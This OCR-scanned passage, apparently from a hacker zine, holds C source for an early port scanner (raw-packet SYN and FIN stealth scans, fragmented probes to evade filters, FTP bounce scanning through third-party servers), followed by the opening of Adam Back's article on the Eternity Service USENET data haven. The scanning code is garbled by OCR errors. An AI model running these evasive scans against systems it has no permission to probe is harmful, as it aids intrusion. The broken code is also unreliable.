source = &ouraddr; 

} 

else { 

source = safe_malloc(sizeof (struct in_addr)); 

source_malloc = 1; 

if (gethostname (myname, MAXHOSTNAMELEN 

!(myhostent = gethostbyname (myname 

) 
[ 


fatal ("Your system is fucked up.\n" 
memcpy (source, myhostent-—>h_addr_list 
} 
if (debugging) 
printf ("We skillfully deduced that your address is %s\n", 
inet_ntoa(*source)); 


0], sizeof (struct in_addr) ); 


} 


starttime = time(NULL); 


do { 
for(i=0; i < max_parallel_sockets && portarray[j]; i++) { 
if ((sockets[i] = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0 ) 
perror("socket trobles in syn_scan"); 
else { 


if (fragment) 
send_small_fragz(sockets[i], source, &target, MAGIC_PORT, 
portarray[j++], TH_SYN); 
else send_tcp_raw(sockets[i], source , &target, MAGIC_PORT, 
portarray[j++],0,0,TH_SYN,0,0,0); 


usleep (10000); 
} 
} 
if ((res = select (received + 1, &fd_read, NULL, NULL, &tv)) < 0) 
perror("select problems in syn_scan"); 
else if (res > 0) { 


while ((bytes = recvfrom(received, packet, 65535, 0, 
(struct sockaddr *)&from, &fromsize)) > 0) f 
if (ip->saddr == target.s_addr) { 


if (tcp->th_flags & TH_RST) { 
if (debugging > 1) printf("Nothing open on port %d\n", 
ntohs (tcp->th_sport) ); 
} 
else /*if (tcp->th_flags & TH_SYN && tcp->th_flags & TH_ACK)*/ { 
if (debugging || verbose) { 
printf ("Possible catch on port %d! Here it is:\n", 
ntohs (tcp->th_sport)); 
readtcppacket (packet,1); 
} 
addport (ports, ntohs(tcp->th_sport), IPPROTO_TCP, NULL); 
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for(i=0; i < max_parallel_sockets && portarray[j]; i++) close(sockets[i]); 


} while (portarray[j]); 


if (debugging || verbose) 
printf ("The TCP SYN scan took %ld seconds to scan %d ports.\n", 
time (NULL) - starttime, number_of_ports); 
if (source_malloc) free(source); /* Gotta save those 4 bytes! ;) */ 


close (received); 
return *ports; 


} 


int send_tcp_raw( int sd, struct in_addr *source, 
struct in_addr *victim, unsigned short sport, 
unsigned short dport, unsigned long seq, 
unsigned long ack, unsigned char flags, 
unsigned short window, char *data, 
unsigned short datalen) 


{ 


struct pseudo_header { 
/*for computing TCP checksum, see TCP/IP Illustrated p. 145 */ 
unsigned long s_addr; 
unsigned long d_addr; 
char zer0; 
unsigned char protocol; 
unsigned short length; 
}; 
char packet[sizeof (struct iphdr) + sizeof(struct tcphdr) + datalen]; 
/*With these placement we get data and some field alignment so we aren’t 
wasting too much in computing the checksum */ 


struct iphdr *ip = (struct iphdr *) packet; 

struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr)); 

struct pseudo_header *pseudo = (struct pseudo_header *) (packet + sizeof(struct iphdr) - s 
izeof(struct pseudo_header)); 

int res; 


struct sockaddr_in sock; 

char myname [MAXHOSTNAMELEN + 1]; 
struct hostent *myhostent; 

int source_malloced = 0; 


/* check that required fields are there and not too silly */ 

if ( !victim || !sport || !dport || sd < 0) { 
fprintf(stderr, "send_tcp_raw: One or more of your parameters suck!\n"); 
return -1; 


} 


/* if they didn’t give a source address, fill in our first address */ 
if (!source) { 
source_malloced = 1; 
source = safe_malloc(sizeof(struct in_addr)); 
if (gethostname (myname, MAXHOSTNAMELEN) | | 
!(myhostent = gethostbyname (myname) ) ) 
fatal ("Your system is fucked up.\n"); 
memcpy (source, myhostent->h_addr_list[0], sizeof(struct in_addr) ); 
if (debugging > 1) 
printf ("We skillfully deduced that your address is %s\n", 
inet_ntoa(*source)); 


/*do we even have to fill out this damn thing? This is a raw packet, 
after all */ 

sock.sin_family = AF_INET; 

sock.sin_port = htons(dport); 

sock.sin_addr.s_addr = victim-—>s_addr; 
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bzero(packet, sizeof(struct iphdr) + sizeof(struct tcphdr)); 


pseudo->s_addr = source->s_addr; 
pseudo->d_addr = victim->s_addr; 
pseudo->protocol = IPPROTO_TCP; 
pseudo->length = htons (sizeof (struct tcphdr) + datalen); 


tcp->th_sport 
tcp->th_dport 
if (seq) 
tcp->th_seq htonl (seq) ; 

else tcp->th_segq = rand() + rand(); 


htons (sport); 
htons (dport) ; 


if (flags & TH_ACK && ack) 

tcp->th_ack = htonl(seq); 

else if (flags & TH_ACK) 
tcp->th_ack = rand() + rand(); 


tcp->th_off = 5 /*words*/; 
tcp->th_flags = flags; 


if (window) 
tcp->th_win = window; 
else tcp->th_win = htons(2048); /* Who cares */ 


tcp->th_sum = in_cksum((unsigned short *)pseudo, sizeof(struct tcphdr) + 
sizeof (struct pseudo_header) + datalen); 


/* Now for the ip header */ 

bzero(packet, sizeof (struct iphdr)); 

ip->version = 4; 

ip->ihl = 5; 

ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + datalen); 
ip->id = rand(); 

ip->ttl = 255; 

ip->protocol = IPPROTO_TCP; 

ip->saddr = source->s_addr; 

ip->daddr = victim->s_addr; 

ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); 


if (debugging > 1) { 
printf ("Raw TCP packet creation completed! Here it is:\n"); 
readtcppacket (packet, ntohs (ip->tot_len)); 
} 
if (debugging > 1) 
printf("\nTrying sendto(%d , packet, %d, 0, %s , %d)\n", 

sd, ntohs(ip->tot_len), inet_ntoa(*victim), 

sizeof (struct sockaddr_in)); 
if ((res = sendto(sd, packet, ntohs(ip->tot_len), 0, 

(struct sockaddr *)&sock, sizeof(struct sockaddr_in))) == -1) 


perror("sendto in send_tcp_raw"); 
if (source_malloced) free(source); 
return -1; 
} 
if (debugging > 1) printf("successfully sent %$d bytes of raw_tcp!\n", res); 


if (source_malloced) free(source); 
return res; 


} 


/* A simple program I wrote to help in debugging, shows the important fields 
of a TCP packet*/ 

int readtcppacket (char *packet, int readdata) { 

struct iphdr *ip = (struct iphdr *) packet; 

struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr)); 

char *data = packet + sizeof(struct iphdr) + sizeof(struct tcphdr); 

int tot_len; 
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char sourcehost[16] 
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} 


/* We don’t exactly need real crypto here 


flags & 


(tcp->th_flags & 
(tcp->th_flags & 


(readdata && i < tot_len) 
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printf ("%S2XxX% 


ip->ttl); 
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int shortfry(unsigned short *ports) { 
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ports [num] 
} 
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} 
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offset field: 
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/* Much of this is swiped from my send_tcp_raw function above, 
doesn’t support fragmentation */ 
int send_small_fragz(int sd, 


int sport, 


struct pseudo_header { 
/*for computing TCP checksum, 


unsigned 
unsigned 
char zer0; 


long s_addr; 
long d_addr; 


struct in_addr *source, 
int flags) { 
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unsigned char protocol; 
unsigned short length; 
}; 


/*In this placement we get data and some field alignment so we aren’t wasting 


too much to compute the TCP checksum. */ 
char packet[sizeof (struct iphdr) + sizeof(struct tcphdr) + 100]; 


struct iphdr *ip = (struct iphdr *) packet; 
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct iphdr)); 
struct pseudo_header *pseudo = (struct pseudo_header *) (packet + sizeof(struct iphdr) 


zeof(struct pseudo_header) ); 
char *frag2 = packet + sizeof(struct iphdr) + 16; 


struct iphdr *ip2 = (struct iphdr *) (frag2 - sizeof(struct iphdr)); 
int res; 

struct sockaddr_in sock; 

intLdy 


/*Why do we have to fill out this damn thing? This is a raw packet, after all */ 


sock.sin_family = AF_INET; 
sock.sin_port = htons(dport); 
sock.sin_addr.s_addr = victim-—>s_addr; 


bzero(packet, sizeof(struct iphdr) + sizeof(struct tcphdr)); 


pseudo->s_addr = source->s_addr; 
pseudo->d_addr = victim->s_addr; 
pseudo->protocol = IPPROTO_TCP; 
pseudo->length = htons (sizeof (struct tcphdr)); 


tcp->th_sport = htons(sport); 
tcp->th_dport htons (dport) ; 
tcp->th_seq = rand() + rand(); 


tcp->th_off = 5 /*words*/; 
tcp->th_flags = flags; 


tcp->th_win = htons(2048); /* Who cares */ 


tcp->th_sum in_cksum((unsigned short *)pseudo, 


sizeof (struct tcphdr) + sizeof(struct pseudo_header) ); 


/* Now for the ip header of fragl */ 
bzero(packet, sizeof(struct iphdr)); 
ip->version = 4; 

ip->ihl = 5; 


/*RFC 791 allows 8 octet frags, but I get "operation not permitted" (EPERM) 


when I try that. */ 
ip->tot_len = htons(sizeof(struct iphdr) + 16); 
id = ip->id rand(); 
ip->frag_off = htons (MORE_FRAGMENTS) ; 
ip->ttl = 255; 
ip->protocol = IPPROTO_TCP; 


ip->saddr = source->s_addr; 
ip->daddr = victim->s_addr; 
ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); 


if (debugging > 1) { 


printf ("Raw TCP packet fragment #1 creation completed! Here it is:\n"); 


hdump (packet, 20) ; 
} 
if (debugging > 1) 
printf("\nTrying sendto(%d , packet, %d, 0, %s , %d)\n", 
sd, ntohs(ip->tot_len), inet_ntoa(*victim), 
sizeof (struct sockaddr_in)); 
if ((res = sendto(sd, packet, ntohs(ip->tot_len), 0, 
(struct sockaddr *)&sock, sizeof(struct sockaddr_in) )) 
{ 
perror("sendto in send_syn_fragz"); 
return -1; 


si 
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} 
if (debugging > 1) printf("successfully sent %d bytes of raw_tcp!\n", res); 


/* Create the second fragment */ 

bzero(ip2, sizeof(struct iphdr)); 

ip2->version = 4; 

ip2->ihl = 5; 

ip2->tot_len = htons(sizeof(struct iphdr) + 4); /* the rest of our TCP packet */ 
ip2->id = id; 

ip2->frag_off = htons (2); 

ip2->ttl = 255; 

ip2->protocol = IPPROTO_TCP; 


ip2->saddr = source->s_addr; 
ip2->daddr = victim->s_addr; 
ip2->check = in_cksum((unsigned short *)ip2, sizeof(struct iphdr)); 


if (debugging > 1) { 
printf ("Raw TCP packet fragment creation completed! Here it is:\n"); 
hdump (packet, 20); 
} 
if (debugging > 1) 
printf("\nTrying sendto(%d , ip2, Sd, 0, %s , %d)\n", sd, 
ntohs (ip2->tot_len), inet_ntoa(*victim), sizeof(struct sockaddr_in))j; 
if ((res = sendto(sd, ip2, ntohs(ip2->tot_len), 0, 
(struct sockaddr *)&sock, sizeof(struct sockaddr_in))) == -1) 


perror("sendto in send_tcp_raw"); 
return -1; 


} 


return 1; 


} 
/* Hex dump */ 
void hdump (unsigned char *packet, int len) { 


unsigned int i=0,  j=0; 


printf("Here it is:\n"); 


for(i=0; i < len; itt) { 
j = (unsigned) (packet[i]); 
pPLIne#E ("S-2%. "pe st 
if (!((i+1)%16)) 
printf ("\n"); 
else if (!((it1)%4)) 
pLrankeEe eC’: 4 
} 
printf ("\n"); 
} 


portlist fin_scan(struct in_addr target, unsigned short *portarray, 
struct in_addr *source, int fragment, portlist *ports) { 


nt rawsd, tcpsd; 

nt done = 0, badport, starttime, someleft, i, j=0, retries=2; 

nt source_malloc = 0; 

nt waiting_period = retries, sockaddr_in_size = sizeof (struct sockaddr_in) ; 
nt bytes, dupesinarow = 0; 


nsigned long timeout; 

truct hostent *myhostent; 

har response[65535], myname[513]; 

truct iphdr *ip = (struct iphdr *) response; 

truct: tephdr “tcp; 

nsigned short portno[max_parallel_sockets], trynum[max_parallel_sockets]; 
struct sockaddr_in stranger; 


GHNAWG HEHE EF 


timeout = (global_delay)? global_delay : (global_rtt)? (1.2 * global_rtt) + 10000 
bzero(&stranger, sockaddr_in_size); 


le5; 
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bzero(portno, max_parallel_sockets * sizeof (unsigned short) ); 
bzero(trynum, max_parallel_sockets * sizeof (unsigned short) ); 
starttime = time(NULL); 

if (debugging || verbose) 


printf ("Initiating FIN stealth scan against %s $ld useconds\n", curren 


t_name, inet_ntoa(target), timeout); 


(6s), Sleep delay: 


if { 


(ouraddr.s_addr) 
source &o0uraddr; 


(!source) 
if { 


} 

else { 

source safe_malloc(sizeof(struct i 

source_malloc sie 

if (gethostname (myname, MAXHOSTNAMEL 

! (myhostent gethostbyname (my 

fatal ("Your system is fucked up.\n" 

memcpy (source, myhostent-—>h_addr_list 

} 

if 


J], sizeof(struct in_addr) ); 
(debugging || verbose) 
printf ("We skillfully deduced that your address is %s\n", 
inet_ntoa(*source)); 


} 


if ((rawsd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0 ) 
perror("socket trobles in fin_scan"); 
if ((tcpsd = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 ) 
perror("socket trobles in fin_scan"); 
unblock_socket (tcpsd) ; 
while(!done) { 
for(i=0; i < max_parallel_sockets; i++) { 
if ('!portno[i] && portarray[j]) { 
portno[i] = portarray[jtt]; 
} 
if (portno[i]) { 
if (fragment) 
send_small_fragz(rawsd, source, &target, MAGIC_PORT, portno[i], TH_FIN); 
else send_tcp_raw(rawsd, source , &target, MAGIC_PORT, 
portno[i], 0, 0, TH_FIN, 0, 0, 0); 


usleep (10000); 


/* *WE* normally do not need this, 
lamer often does */ 


but the target 


} 
} 


usleep (timeout 


); 
dupesinarow = 0; 
while ((bytes = recvfrom(tcpsd, response, 65535, 0, (struct sockaddr *) 
éstranger, &sockaddr_in_size)) > 0) 
if (ip->saddr == target.s_addr) { 
tcp = (struct tcphdr *) (response + 4 * ip->ihl); 
if (tcp->th_flags & TH_RST) { 
badport = ntohs(tcp->th_sport) ; 
if (debugging > 1) printf("Nothing open on port %d\n", badport) ; 


/* delete the port from active scanning */ 
for(i=0; i < max_parallel_sockets; itt) 
if (portno[i] == badport) { 
if (debugging && trynum[i] > 0) 
printf("Bad port %*d caught on fin scan, try number %d\n", 


badport, trynum[i] + 1); 
trynum[i] = 0; 
portno[i] = 0; 


break; 


} 
TE (ae 


max_parallel_sockets) 


{ 
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if (debugging) 
printf ("Late packet or dupe, deleting port %d.\n", badport); 
dupesinarowtt+; 
if (ports) deleteport (ports, badport, IPPROTO_TCP) ; 
} 
} 
else 
if (debugging > 1) { 
printf ("Strange packet from target%d! Here it is:\n", 
ntohs (tcp->th_sport) ); 
if (bytes >= 40) readtcppacket (response,1); 
else hdump(response,bytes) ; 
} 
} 


/* adjust waiting time if neccessary */ 
if (dupesinarow > 6) { 
if (debugging || verbose) 
printf ("Slowing down send frequency due to multiple late packets.\n"); 
if (timeout < 10 * ((global_delay)? global_delay: global_rtt + 20000)) timeout *= 1.5; 
else { 
printf ("Too many late packets despite send frequency decreases, skipping scan.\n"); 
if (source_malloc) free(source); 
return *ports; 


} 


/* Ok, collect good ports (those that we haven’t received responses too 
after all our retries */ 


someleft = 0; 
for(i=0; i < max_parallel_sockets; itt) 
if (portno[i]) { 
if (++trynum[i] >= retries) { 
if (verbose || debugging) 


printf("Good port %d detected by fin_scan!\n", portno[i]); 
addport (ports, portno[i], IPPROTO_TCP, NULL); 
send_tcp_raw( rawsd, source, &target, MAGIC_PORT, portno[i], 0, 0, 
TH_FIN, 0, 0, 0); 
portno[i] = trynum[i] = 0; 
} 
lse someleft = 1; 


if ('portarray[j] && (!someleft || --waiting_period <= 0)) donet+; 
} 
if (debugging || verbose) 
printf("The TCP stealth FIN scan took %ld seconds to scan %d ports.\n", 
time (NULL) - starttime, number_of_ports); 
if (source_malloc) free(source); 
close (tcpsd) ; 
close (rawsd) ; 


return *ports; 


} 


int ftp_anon_connect (struct ftpinfo *ftp) { 
int sd; 

struct sockaddr_in sock; 

int res; 

char recvbuf [2048]; 

char command[512]; 


if (verbose || debugging) 
printf ("Attempting connection to ftp://%s:%s@%s:%i\n", ftp->user, ftp-—>pass, 
ftp->server_name, ftp->port); 


if ((sd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { 
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perror("Couldn’t create ftp_anon_connect socket"); 
return 0; 


} 


sock.sin_family = AF_INET; 


sock.sin_addr.s_addr = ftp->server.s_addr; 

sock.sin_port = htons(ftp->port); 

res = connect(sd, (struct sockaddr *) &sock, sizeof(struct sockaddr_in)); 
if (res < 0) { 


printf("Your ftp bounce proxy server won’t talk to us!\n"); 
exit (1); 
} 


if (verbose || debugging) printf ("Connected:"); 
whil ((res = recvtime(sd, recvbuf, 2048,7)) > 0) 
if (debugging || verbose) { 
recvbuf[res] = ’\0’; 


printf("Ss", recvbuf); 
} 
if (res < 0) { 
perror("recv problem from ftp bounce server"); 
exit (1); 
} 


snprintf(command, 511, "USER %s\r\n", ftp->user); 
send(sd, command, strlen(command), 0); 
res = recvtime(sd, recvbuf, 2048,12); 
if (res <= 0) { 

perror("recv problem from ftp bounce server"); 


exit(l1); 


} 
recvbuf[res] = ’\0’; 

if (debugging) printf("sent username, received: %s", recvbuf); 

if (recvbuf[0] == '5’) { 

printf ("Your ftp bounce server doesn’t like the username \"%s\"\n", 
ftp->user); 

exit(l1); 


} 
snprintf (command, 511, "PASS %s\r\n", 
send(sd, command, strlen(command), 0); 
res = recvtime(sd, recvbuf, 2048,12); 
if (res < 0) { 

perror("recv problem from ftp bounce server\n"); 

exit (1); 
} 
if (!res) printf("Timeout from bounce server ..."); 
else { 
recvbuf[res] = ’\0’; 
if (debugging) printf("sent password, received: %s", recvbuf); 
if (recvbuf[0] == ’5’) { 

fprintf(stderr, "Your ftp bounce server refused login combo (%s/%s)\n", 

ftp->user, ftp->pass); 


ftp->pass); 


exit(l1); 
} 
} 
whil ((res = recvtime(sd, recvbuf, 2048,2)) > 0) 
if (debugging) { 
recvbuf[res] = ’\0’; 


printf("Ss", recvbuf); 
} 
if (res < 0) { 
perror("recv problem from ftp bounce server"); 
exit (1); 
} 


if (verbose) printf("Login credentials accepted by ftp server!\n"); 


ftp->sd = sd; 
return sd; 


} 
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int recvtime(int sd, char *buf, int len, int seconds) { 


int res; 
struct timeval timeout 
fd_set readfd; 


{seconds, 0}; 


FD_ZERO (&readfd) ; 

FD_SET (sd, &readfd); 

res = select(sd + 1, &readfd, NULL, NULL, &timeout); 
if (res > 0) { 

res = recv(sd, buf, len, 0); 

if (res >= 0) return res; 


perror("recv in recvtime"); 
return 0; 

} 

else if (!res) 
perror ("select () 
return -1; 


} 


return 0; 
in recvtime"); 


portlist bounce_scan(struct in_addr target, 
struct ftpinfo *ftp, 


unsigned short *portarray, 
portlist *ports) { 


int starttime, res , sd = ftp->sd, i=0; 
char *t = (char *) &target; 
int retriesleft = FTP_RETRIES; 
char recvbuf [2048]; 
char targetstr[20]; 
char command[512]; 
snprintf(targetstr, 20, "%d,%d,%d,%d,0,", UC(t[0]), UC(t[1]), UC(t[2]), UC(t[3])); 
starttime = time(NULL); 
if (verbose || debugging) 
printf ("Initiating TCP ftp bounce scan against %s (%s)\n", 
current_name, inet_ntoa(target) ); 
for(i=0; portarray[i]; i++) { 
snprintf (command, 512, "PORT %s%i\r\n", targetstr, portarrayl[i]); 
if (send(sd, command, strlen(command), 0) < 0) { 
perror("send in bounce_scan"); 
if (retriesleft) 
if (verbose || debugging) 


printf("Our ftp proxy server hung up on us! 
retriesleft-—-; 
close(sd); 
ftp->sd ftp_anon_connect (ftp); 
if (ftp->sd < 0) return *ports; 
sd ftp->sd; 
==; 
} 
else { 
fprintf(stderr, 


n"); 
close(sd); 
ftp->sd -1; 
return *ports; 


} else { /* Our send is good */ 
s = recvtime(sd, recvbuf, 2048,15); 


(res <= 0) perror("recv problem from ftp bounce 


} 
el 
xr 
i 


/* our recv is good */ 
INO"? 


lse { 
recvbuf [res] 
if (debugging) 


S 


portarray[i], recvbuf); 
(recvbuf[0] == '5’) { 
if (portarray[i] > 1023) { 


fprintf(stderr, "Your ftp bounce server sucks, 


if 


exit (1); 


"Our socket descriptor is dead and we are out of retries. 


printf ("result of port query on port %i: 


retrying\n"); 


up.\ 


Giving 


server\n"); 


fo) WwW 
Ss", 


it won’t let us feed bogus ports!\n" 
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else { 
fprintf(stderr, "Your ftp bounce server doesn’t allow priviliged ports, skipping th 
em. \n"); 
while(portarray[i] && portarray[i] < 1024) i++; 
if (!portarray[i]) { 
fprintf(stderr, "And you didn’t want to scan any unpriviliged ports. Giving up.\ 


Vie: close(sd); 

Etp=>sa = =1l; 

return *ports;*/ 

/* screw this gentle return crap! This is an emergency! */ 
exit(1); 


} 
} 


else /* Not an error message */ 
if (send(sd, "LIST\r\n", 6, 0) >0) { 


res = recvtime(sd, recvbuf, 2048,12); 
if (res <= 0) perror("recv problem from ftp bounce server\n"); 
else { 

recvbuf[res] = ’\0’; 


if (debugging) printf("result of LIST: 
if ('strncemp(recvbuf, "500", 3)) { 
/* fuck, we are not aligned properly */ 


$s", recvbuf); 


if (verbose || debugging) 
printf ("misalignment detected ... correcting.\n"); 
res = recvtime(sd, recvbuf, 2048,10); 
} 
if (recvbuf[0] == '1’ || recvbuf[0] == '2’) { 
if (verbose || debugging) printf("Port number %i appears good.\n", 


portarray[i]); 
addport (ports, portarray[i], IPPROTO_TCP, NULL); 


if (recvbuf[0] == '1’) { 
res = recvtime(sd, recvbuf, 2048,5); 
recvbuf[res] = ’\0’; 
if ((res > 0) && debugging) printf("nxt line: $s", recvbuf); 
} 
} 
} 
} 
} 
} 
} 
if (debugging || verbose) 
printf("Scanned %d ports in %ld seconds via the Bounce scan.\n", 
number_of_ports, time(NULL) - starttime); 


return *ports; 


} 


/* parse a URL stype ftp string of the form user:pass@server:portno */ 
int parse_bounce(struct ftpinfo *ftp, char *url) { 
char *p = url, *g; *s7; 


if ((q = strrchr(url, '@’))) /*we have username and/or pass */ { 
m Galt fe =F NOT 
if ((s = strchr(q, ':’))) 
{ /* has portno */ 
*(stt+) = '\0'; 


strncpy (ftp->server_name, q, MAXHOSTNAMELEN) ; 
ftp->port = atoi(s); 

} 
else strncpy(ftp->server_name, gq, MAXHOSTNAMELEN) ; 


if ((s = strchr(p, ’:’))) { /* User AND pass given */ 
*(stt) = "\0'; 
strncpy(ftp->user, p, 63); 
strncpy(ftp->pass, s, 255); 
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else { /* Username ONLY given */ 
printf("Assuming %s is a username, and using the default p 
p, ftp->pass); 
strncpy(ftp->user, p, 63); 
} 
} 
else /* no username or password given */ 
if ((s = strcehr(url, '’:’))) { /* portno is given */ 
e(stt) = "\0"7 
strncpy (ftp->server_name, url, MAXHOSTNAMELEN) ; 
ftp->port = atoi(s); 
} 
else /* default case, no username, password, or portnumber 
strncpy (ftp->server_name, url, MAXHOSTNAMELEN) ; 


r 
4 


assword: 


* / 


ftp->user[63] = ftp->pass[255] ftp->server_name [MAXHOSTNAMEL 


return 1; 


} 


/* 
x I’1ll bet you’ve never seen this function before (yeah 
a standard swiped checksum routine. 

*/ 


unsigned short in_cksum(unsigned short *ptr,int nbytes) { 


register long sum; /* assumes long == 32 
u_short oddbyte; 


right) ! 


bits */ 


s\n", 


register u_short answer; /* assumes u_short == 16 bits */ 


/* 
Our algorithm is simple, using a 32-bit accumulator (sum), 
* we add sequential 16-bit words to it, and at the end, fold 
all the carry bits from the top 16 bits into the lower 16 b 
*/ 


sum = 0; 

while (nbytes > 1) {f{ 
sum += *ptrt++; 

nbytes -= 2; 

} 


/* mop up an odd byte, if necessary */ 

if (nbytes == 1) { 

oddbyte = 0; /* make sure top half is zero */ 
*((u_char *) &0ddbyte) = * (u_char *)ptr; /* one byte only */ 
sum += oddbyte; 

} 


/* 
* Add back carry outs from top 16 bits to low 16 bits. 
xf 


sum = ( 

sum += (sum >> 16); /* add carry */ 
answer = 

return (answer); 


} 


<-> 


----[ EOF 


sum >> 16) + (sum & Oxffff); /* add high-16 to low- 


back 
LES 


AG: Xi /: 


“sum; /* ones-complement, then truncate to 16 bits */ 
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[ The Eternity Service 


SaaS SSS [ Adam Back <aba@dcs.exe.ac.uk> 


Information wants to be Free 


Information wants to be free. Censorship sucks. Having your account yanked 
because some censorious idiot doesn’t like you discussing hacking tips and 
tricks in USENET sucks. Being tortured to death by some totalitarian 


country’s military police for speaking the truth about government corruption 
sucks even more. 


Have friends who have been hounded by the Feds, SPA software police, or 

system admins who believe in security by obscurity? Had nasty threats made by 
censorious system admins for helpfully drawing their attention to flaws in their 
systems security? Ever had a control freak try to get your web pages 

censored because they don’t like its content, or simply because they get their 
kicks harassing people? Ever wanted to publish something on the ’Net but felt 
intimidated by censors? 


Do you consider that free speech is your right as guaranteed by the first 
amendment of the US constitution, and do you therefore also consider it your 
right to speak anonymously? There are lots of reasons to protect the ability 
to speak anonymously. Anonymous speech is required for truly free speech. 
Strongly anonymous free speech is the freest speech of all. If you’re going to 
preserve your ability to speak anonymously, and protect your right to free 
speech you might as well do it properly... 


Want to do something to help fr speech? Want to piss off the ’Net censors? 
Want to piss off censorious Governments? Read on... 


What is the Eternity Service? 


The Eternity Service is a distributed data-haven, it takes a different 
approach to ensuring unpopular content can be published. Traditionally 
unpopular content has been surreptitiously exchanged via DCCs in IRC, or PGP 
encrypted email, or FSP, or in funny named directories via FTP or via agreed 
file names in incoming directories set drwx-wx-wx. Other kinds of unpopular 
content have been published on web pages for a short time until the censor 
gets to work and threatens the ISP, the publisher’s employee, and the publisher 
with law suits. Sometimes these web pages get mirrored, if there is someone 
interested, and spoiling for a fight, or if the content is only censored by 
force of law in one jurisdiction. 


The Eternity Service deals with censorship more directly: it confronts the 
problem in a more general way with the aim that anyone should be able to 
publish anything anonymously in a convenient persistent, uncensorable 
data-haven. 


So in a nut-shell that is the design goal of the eternity service, to allow 
anyone to publish material which others would like to censor. For convenience 
the publishing medium addressed is the World Wide Web. 

Systems for publishing anonymously in USENET news and email already exist: 
cypherpunks type I and type II (mixmaster) remailers. 


Why the name ‘Eternity Service’? 
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There is a cryptographic paper by Ross Anderson called "The Eternity Service", 
which is where the idea for this implementation came from. I rather liked 
Ross’s name for his conceptual service, and instead of thinking up some other 
name I just "borrowed" his name. Readers might find his paper interesting, 
it’s on the web in htmlized form at: 


http://www.cl.cam.ac.uk/users/rjal4/eternity/eternity.html 


Ross’s design is quite ambitious, so I simplified his design in developing the 
software included with this article. 


My implementation shares Ross’s main design goal, which is to create a 
censorship-proof, long-term document store, but its design has been made much 
simpler and less ambitious initially to make it easier to implement. The main 
simplification is that I built the design on top of an existing hard-to-censor 
distributed distribution channel: ‘alt’ USENET newsgroups. This design is 
described in the next sections. 


The motivation for providing a simplified version was to have something people 
could use practically, today. Another reason is that by releasing this 
design, and it’s implementation, it allows you, the reader, to play with it, 
and to contribute to it, improve it in a piecewise fashion in the good 
tradition of free software on the ’Net. The design calls for many eternity 
servers to be in existence to make it hard to censor. 


At time of writing a mailing list exists for discussion on using and improving 
the eternity service. Instructions on how to subscribe the eternity mailing 
list are given at the bottom of this article. 


USENET and distributed systems 


The Internet was built to survive nuclear attack. It would survive such an 
attack because it is a distributed system. Distributed systems are hard to 
break, and therefore, hard to censor. USENET, particularly the ‘alt* 
newsgroups offer the most amazing chaotic discussion areas. The articles 
which are posted often contain materials which would be considered illegal in 
many jurisdictions. And yet USENET lives, and ‘alt * USENET newsgroups thrive. 
Extremely well funded attackers have tried to remove individual ‘alt ‘* USENET 
groups, and to censor posts in alt USENET groups. They have all failed. 


he reason that USENET is hard to attack is because it is a distributed 


= 


Hi 

system. The network of news feeds has some redundancy. USENET articles enter 
the news distribution network from anywhere in the network. If a censor in 
one country succeeds in persuading a news site to censor its feed and not 
carry particular alt groups, it doesn’t affect the overall system that much. 
T 

Ss 

a 

i 


here are lots of other nodes carrying the groups, disgruntled users will 
witch ISPs, and disgruntled down-feed sites will switch feeds. The system 
outes *around* censorship. There are just so many USENET admins with 
ndividual opinions, and commercial interests in carrying groups users want to 
read, that USENET can not die. 


It occurred to me in trying to design a simplified eternity service, that it 
would be useful to borrow some of Usenet’s indestructible nature. USENET is 
part of the landscape; it’s here to stay. If we build a new distributed 
distribution system from scratch, to start with there won’t be many nodes. 
The censor will have any easy time censoring a few nodes, he’1ll just go and 
harass each of them in turn. 


With USENET on the other hand, it has been around for so long, and is carried 
at so many sites that it would be a huge task for a censor to even have a 
Significant affect on USENET. 


So, the design of my eternity server aims to allow operators to point the 
finger at USENET and say: "that’s where the content is coming from, if you 
want to censor anything go attack USENET". 
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My eternity server design is a service designed to blur the differences 
between USENET news and the Web. It provides an interface which makes a 
stream of encrypted USENET news articles look like WWW pages with a persistent 
URL. As the default disclaimer for eternity servers says: 


Note to censors: Eternity servers are specialized search engines for 
reading web documents from USENET news. The pages you request are 
actually USENET news posts which the server is searching for, 
reformatting and forwarding to you. The administrator of this server 
has no control over the content of USENET news, and will not be held 
responsible for any documents you instruct this server to forward 
for you. 


Eternity Server design 


Once you accept the idea that it would be nice to borrow, or build upon some 
of USENET news’s strength as a uncensorable distribution mechanism, the next 
issue is achieving this, technically. The main differences between USENET 
news articles and WWW pages is that USENET is transient, the articles expire 
in newsgroups, and that USENET articles have no persistent globally 
addressable locator. USENET is not as convenient as the Web; there are no 
hypertext links between articles, and there are no inline images. 


Eternity service articles are WWW pages specially formatted and posted to 
USENET news. The eternity server reads news and translates Web page requests 
into GROUP and ARTICLE commands to an NNTP news server (or file system 
accesses to a local news spool). (The default list of newsgroups to read 
consists of one group: alt.anonymous.messages). 


Web pages are often updated, as one of the interesting aspects of the WWW as a 
publishing medium is that it allows people to maintain up-to-date information. 
This maintains interest and keeps people coming back to an interesting site to 
see what else the author has collected, or what other related pages have been 
added. A sense of community can be built up with others submitting interesting 
links, corrections, and tips to the author. 


[To provide the possibility of updating web pages with the eternity server, the 
eternity formatting convention allows submitted web pages to be signed with 
PGP. This ensures that no one else can replace your pages with other pages. 
Being able to replace your page with a blank page would allow a censor to 
temporarily censor you. (Only temporary because you could always replace the 
blank page with the real document again). 


With a PGP signature this is prevented... and the system becomes such that 
eternity virtual domains are very much first-come first-served. 


First-come first-served naming 


Eternity URLs are all under the non-existent Top Level Domain (TLD) "eternity". 
(Other TLDs being .com, .org, .edu, .ai, etc) Eternity URLs are therefore of 
the form: 


http://*eternity/* 


Where * represents any string of characters. 


On the Internet domain names must be resolved to IP addresses via Domain Name 
Servers (DNS). The owner of the TLD you desire a domain name in charges you 
for registering a domain. Internic (who currently has a hotly contested 
monopoly on TLDs .com, .org, and .net), charge $100 for the first 2 years, and 
$50 for each year thereafter. 


Eternity domains don’t exist in this sense. There is no root domain server for 
